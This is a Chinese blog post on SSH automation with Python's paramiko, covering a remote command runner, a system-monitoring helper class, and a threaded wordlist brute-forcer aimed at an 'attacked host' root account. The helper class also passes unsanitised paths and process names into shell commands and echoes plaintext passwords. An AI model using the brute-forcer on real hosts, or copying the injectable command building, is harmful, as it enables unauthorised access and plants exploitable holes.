Python使用Paramiko实现SSH管理

举报
王瑞专家 发表于 2023/11/26 13:14:51 2023/11/26
【摘要】 paramiko 是一个用于在Python中实现SSHv2协议的库,它支持对远程服务器进行加密的通信。目前该模块支持所有平台架构且自身遵循SSH2协议,支持以加密和认证的方式,进行远程服务器的连接,你可以在Python中实现SSH客户端和服务器,并进行安全的文件传输和远程命令执行。主要特点:SSH 支持: paramiko 提供了对 SSHv2 协议的完整支持,可以用于安全地连接和通信到远程...

paramiko 是一个用于在Python中实现SSHv2协议的库,它支持对远程服务器进行加密的通信。目前该模块支持所有平台架构且自身遵循SSH2协议,支持以加密和认证的方式,进行远程服务器的连接,你可以在Python中实现SSH客户端和服务器,并进行安全的文件传输和远程命令执行。

主要特点:

  1. SSH 支持: paramiko 提供了对 SSHv2 协议的完整支持,可以用于安全地连接和通信到远程服务器。
  2. SSH 客户端和服务端实现: paramiko 不仅可以用作 SSH 客户端,还可以在 Python 中实现 SSH 服务器。这意味着你可以使用 paramiko 来创建自己的 SSH 服务器,或者编写客户端与远程服务器进行通信。
  3. SFTP 文件传输: paramiko 包含了对 SFTP(SSH 文件传输协议)的实现,可以在安全通道上传输文件,支持上传和下载文件。
  4. 支持密钥认证: 除了用户名和密码认证外,paramiko 还支持使用密钥进行认证,包括支持 RSA 和 DSA 密钥。
  5. 多种认证方法: 支持多种认证方法,包括密码认证、密钥认证、GSS-API 认证等。
  6. 高级特性: 提供了一些高级特性,如端口转发(port forwarding)、代理支持等,使其适用于更复杂的网络场景。
  7. 跨平台: paramiko 可以在多个平台上运行,包括 Linux、Windows 和 macOS。
  8. 易用性: 提供了简单而易用的 API,使得在 Python 中进行 SSH 连接、文件传输等操作变得容易。
  9. 活跃的社区支持: paramiko 是一个开源项目,拥有活跃的社区支持。这意味着你可以在社区中找到文档、示例代码和得到技术支持。

实现简单SSH连接

import paramiko,threading
import argparse

class MyThread(threading.Thread):
    def __init__(self,address,username,password,port,command):
        super(MyThread, self).__init__()
        self.address = address
        self.username = username
        self.password = password
        self.port = port
        self.command = command
    def run(self):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        try:
            ssh.connect(self.address, port=self.port, username=self.username, password=self.password, timeout=1)
            stdin, stdout, stderr = ssh.exec_command(self.command)
            result = stdout.read()
            if not result:
                self.result = stderr.read()
            ssh.close()
            self.result = result.decode()
        except Exception:
            self.result = "0"
    def get_result(self):
        try:
            return self.result
        except Exception:
            return "0"

if __name__ == "__main__":
    # 使用方式: main.py -a 192.168.1.1 -u root -p 123123 -c ifconfig
    parser = argparse.ArgumentParser()
    parser.add_argument("-a",dest="addr",help="指定一个IP地址")
    parser.add_argument("-u",dest="user",help="指定目标主机用户名")
    parser.add_argument("-p",dest="passwd",help="指定目标主机密码")
    parser.add_argument("-c",dest="command",help="指定需要执行的命令")
    args = parser.parse_args()
    if args.addr and args.user and args.passwd and args.command:
        obj = MyThread(str(args.addr),str(args.user),str(args.passwd),"22",str(args.command))
        obj.start()
        obj.join()
        ret = obj.get_result()
        if ret != "0":
            print(ret)
    else:
        parser.print_help()

实现SSH批量尝试

import pexpect
import os,sys,time
import threading
import argparse

def SSHConnect(Host,User,Password,Port,Command):
    try:
        child = pexpect.spawn('ssh -l %s %s -p %s %s' %(User,Host,Port,Command),timeout=1)
        ret = child.expect([pexpect.TIMEOUT, 'Are you sure you want to continue connecting','[Pp]assword:',r"([^-]>|#)"])
        if ret == 0:                   # 连接超时
            child.close()
            return 0
        elif ret == 1:                 # SSH提示你是否确认连接
            child.sendline ('yes')     # 我们输入yes
            child.expect ('password: ')# 输入yes后应该提示输入密码,我们再次期待 password
            ret = child.expect([pexpect.TIMEOUT, 'password: '])
            if ret == 0:               # 连接超时
                child.close()
                return 0
        ret = child.sendline(Password)
        if ret == 5:
            #child.expect(pexpect.EOF)
            #return child.before
            return 1
        child.close()
        return 0
    except Exception:
        child.close()
        return 0

def ThreadBlast(Host,User,Password,Port,semaphore):
    semaphore.acquire()        # 加锁
    global number,PassCount
    RetCode = SSHConnect(Host,User,Password,Port,"pwd")
    if RetCode == 1:
        print("[*] 索引: {}/{} --> 密码: {}".format(str(number),str(PassCount),Password))
    else:
        print("[-] 索引: {}/{} --> 尝试: {}".format(str(number),str(PassCount),Password))
        
    number = number + 1
    semaphore.release()       # 释放锁

if __name__ == "__main__":
    # 使用方式: main.py -H 192.168.1.10 -u root -p 22 -f burp.log
    parser = argparse.ArgumentParser()
    parser.add_argument("-H","--host",dest="host",help="输入一个被攻击主机IP地址")
    parser.add_argument("-u","--user",dest="user",help="输入主机的用户账号,root")
    parser.add_argument("-p","--port",dest="port",help="输入SSH的端口号,22")
    parser.add_argument("-f","--file",dest="file",help="设置密码字典 wordlist.log")
    args = parser.parse_args()
    if args.host and args.user and args.port and args.file:
        number = 0
        semaphore = threading.Semaphore(4)
        fp = open(args.file,"r")
        PassList = fp.readlines()
        PassCount = len(PassList)
        for item in PassList:
            t = threading.Thread(target=ThreadBlast,args=(args.host,args.user,str(item.replace("\n","")),args.port,semaphore))
            t.start()
    else:
        parser.print_help()

封装MySSH通用类

import paramiko, math

class MySSH:
    def __init__(self, address, username, password, default_port):
        self.address = address
        self.default_port = default_port
        self.username = username
        self.password = password

    # 初始化SSH接口
    def Init(self):
        try:
            self.ssh_obj = paramiko.SSHClient()
            self.ssh_obj.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            self.ssh_obj.connect(self.address, self.default_port, self.username, self.password, timeout=3,
                                 allow_agent=False, look_for_keys=False)
            self.sftp_obj = self.ssh_obj.open_sftp()
            return True
        except Exception:
            return False
        return False

    # 执行命令并返回执行结果
    def BatchCMD(self, command):
        try:
            stdin, stdout, stderr = self.ssh_obj.exec_command(command, timeout=3)
            result = stdout.read()
            if len(result) != 0:
                result = str(result).replace("\\n", "\n")
                result = result.replace("b'", "").replace("'", "")
                return result
            else:
                return None
        except Exception:
            return None

    # 执行非交互命令 只返回执行状态 ,或真或假
    def BatchCMD_NotRef(self, command):
        try:
            stdin, stdout, stderr = self.ssh_obj.exec_command(command, timeout=3)
            result = stdout.read()
            if len(result) != 0:
                return True
            else:
                return None
        except Exception:
            return False

    # 将远程文件下载到本地
    def GetRemoteFile(self, remote_path, local_path):
        try:
            self.sftp_obj.get(remote_path, local_path)
            return True
        except Exception:
            return False

    # 将本地文件上传到远程
    def PutLocalFile(self, localpath, remotepath):
        try:
            self.sftp_obj.put(localpath, remotepath)
            return True
        except Exception:
            return False

    # 获取文件大小
    def GetFileSize(self, file_path):
        ref = self.BatchCMD("du -s " + file_path + " | awk '{print $1}'")
        return ref.replace("\n", "")

    # 判断文件是否存在
    def IsFile(self, file_path):
        return self.BatchCMD("[ -e {} ] && echo 'True' || echo 'False'".format(file_path))

    # 获取系统型号
    def GetSystemVersion(self):
        return self.BatchCMD("uname")

    # 关闭SSH接口
    def CloseSSH(self):
        try:
            self.sftp_obj.close()
            self.ssh_obj.close()
        except Exception:
            pass

    # 测试主机连通率
    def GetPing(self):
        try:
            if self.GetSystemVersion() != None:
                print("{} 已连通.".format(self.address))
                return True
            else:
                return False
        except Exception:
            return False

    # 获取文件列表,并得到大小
    def GetFileList(self, path):
        try:
            ref_list = []
            self.sftp_obj.chdir(path)
            file_list = self.sftp_obj.listdir("./")
            for sub_path in file_list:
                dict = {}
                file_size = self.GetFileSize(path + sub_path)
                dict[path + sub_path] = file_size
                ref_list.append(dict)
            return ref_list
        except Exception:
            return False

    # 将远程文件全部打包后拉取到本地
    def GetTarPackageAll(self, path):
        try:
            file_list = self.sftp_obj.listdir(path)
            self.sftp_obj.chdir(path)
            for packageName in file_list:
                self.ssh_obj.exec_command("tar -czf /tmp/{0}.tar.gz {0}".format(packageName))
                self.sftp_obj.get("/tmp/{}.tar.gz".format(packageName), "./file/{}.tar.gz".format(packageName))
                self.sftp_obj.remove("/tmp/{}.tar.gz".format(packageName))
                return True
        except Exception:
            return True

    # 获取磁盘空间并返回字典
    def GetAllDiskSpace(self):
        ref_dict = {}
        cmd_dict = {"Linux\n": "df | grep -v 'Filesystem' | awk '{print $5 \":\" $6}'",
                    "AIX\n": "df | grep -v 'Filesystem' | awk '{print $4 \":\" $7}'"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    # 根据不同版本选择不同的命令
                    os_ref = self.BatchCMD(run_cmd)
                    ref_list = os_ref.split("\n")
                    # 循环将其转换为字典
                    for each in ref_list:
                        # 判断最后是否为空,过滤最后一项
                        if each != "":
                            ref_dict[str(each.split(":")[1])] = str(each.split(":")[0])
            return ref_dict
        except Exception:
            return False

    # 拉取内存数据到本地。
    def GetAllMemSpace(self):
        cmd_dict = {"Linux\n": "cat /proc/meminfo | head -n 2 | awk '{print $2}' | xargs | awk '{print $1 \":\" $2}'",
                    "AIX\n": "svmon -G | grep -v 'virtual' | head -n 1 | awk '{print $2 \":\" $4}'"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    mem_total = math.ceil(int(os_ref.split(":")[0].replace("\n", "")) / 1024)
                    mem_free = math.ceil(int(os_ref.split(":")[1].replace("\n", "")) / 1024)
                    percentage = 100 - int(mem_free / int(mem_total / 100))
                    print("利用百分比: {}  \t 总内存: {}  \t 剩余内存: {}".format(percentage,mem_total,mem_free))
                    return str(percentage) + " %"
        except Exception:
            return False

    # 获取CPU利用率数据
    def GetCPUPercentage(self):
        ref_dict = {}
        cmd_dict = {"Linux\n": "vmstat | tail -n 1 | awk '{print $13 \":\" $14 \":\" $15}'",
                    "AIX\n": "vmstat | tail -n 1 | awk '{print $14 \":\" $15 \":\" $16}'"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ref_list = os_ref.split("\n")
                    for each in ref_list:
                        if each != "":
                            each = each.split(":")
                            ref_dict = {"us": each[0], "sys": each[1], "idea": each[2]}
            print("CPU利用率数据: {}".format(ref_dict))
            return ref_dict
        except Exception:
            return False

    # 获取到系统负载利用率 也就是一分钟负载五分钟负载十五分钟负载
    def GetLoadAVG(self):
        ref_dict = {}
        cmd_dict = {"Linux\n": "cat /proc/loadavg | awk '{print $1 \":\" $2 \":\" $3}'",
                    "AIX\n": "uptime | awk '{print $10 \":\" $11 \":\" $12}'"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ref_list = os_ref.split("\n")
                    for each in ref_list:
                        if each != "":
                            each = each.replace(",","").split(":")
                            ref_dict = {"1avg": each[0],"5avg": each[1],"15avg": each[2]}
                            print("负载利用率: {}".format(ref_dict))
                            return ref_dict
            return False
        except Exception:
            return False

    # 获取系统进程信息,并返回字典格式
    def GetAllProcessSpace(self):
        ref_dict = {}
        cmd_dict = {"Linux\n": "ps aux | grep -v 'USER' | awk '{print $2 \":\" $11}' | uniq",
                    "AIX\n": "ps aux | grep -v 'USER' | awk '{print $2 \":\" $12}' | uniq"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ref_list = os_ref.split("\n")
                    for each in ref_list:
                        if each != "":
                            ref_dict[str(each.split(":")[0])] = str(each.split(":")[1])
            return ref_dict
        except Exception:
            return False

    # 检测指定进程是否存活
    def CheckProcessStatus(self,processname):
        cmd_dict = {"Linux\n": "ps aux | grep '{0}' | grep -v 'grep' | awk {1} | wc -l".format(processname,"{'print $2'}"),
                    "AIX\n": "ps aux | grep '{0}' | grep -v 'grep' | awk {1} | wc -l".format(processname,"{'print $2'}")
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ret_flag = str(os_ref.split("\n")[0].replace(" ","").strip())
                    if ret_flag != "0":
                        return True
            return False
        except Exception:
            return "None"

    # 判断指定进程名是否存在,如果存在返回进程 {PID:0,CPU:0,MEM:0}
    def CheckProcessName(self,ProcName):
        cmd_dict = {"Linux\n": "ps aux | grep '" + ProcName + "' | grep -v 'grep' | awk {'print $2 \":\" $3 \":\" $4'} | head -1",
                    "AIX\n": "ps aux | grep -v 'USER' | awk '{print $2 \":\" $12}' | uniq"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ref_list = os_ref.replace("\n","").split(":")
                    ref_dict = {"PID": ref_list[0], "CPU": ref_list[1], "Mem": ref_list[2]}
            return ref_dict
        except Exception:
            return False
        return False

    # 检测指定端口是否存活
    def CheckPortStatus(self,port):
        cmd_dict = {"Linux\n": "netstat -antp | grep {0} | awk {1}".format(port,"{'print $6'}")
            ,       "AIX\n": "netstat -ant | grep {0} | head -n 1 | awk {1}".format(port,"{'print $6'}")
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ret_flag = str(os_ref.split("\n")[0].replace(" ","").strip())
                    if ret_flag == "LISTEN" or ret_flag == "ESTABLISHED":
                        return True
            return False
        except Exception:
            return False

    # 修改当前用户密码
    def SetPasswd(self,username,password):
        try:
            os_id = self.BatchCMD("id | awk {'print $1'}")
            print(os_id)
            if(os_id == "uid=0(root)\n"):
                self.BatchCMD("echo '{}' | passwd --stdin '{}' > /dev/null".format(password,username))
                return True
        except Exception:
            return False

if __name__ == "__main__":
    ssh = MySSH("132.35.69.71","root","123456789",22)
    if ssh.Init() == True:
        ref = ssh.GetAllDiskSpace()
        print(ref)
【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。